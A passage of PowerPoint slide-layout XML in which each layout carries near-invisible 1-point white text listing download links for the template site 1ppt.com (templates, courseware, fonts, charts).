              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout95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95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95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95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9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96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96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96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96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96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96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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout96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96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96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96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9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97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97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97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97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97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97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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout97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97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97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97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9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98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98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98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98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98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98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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
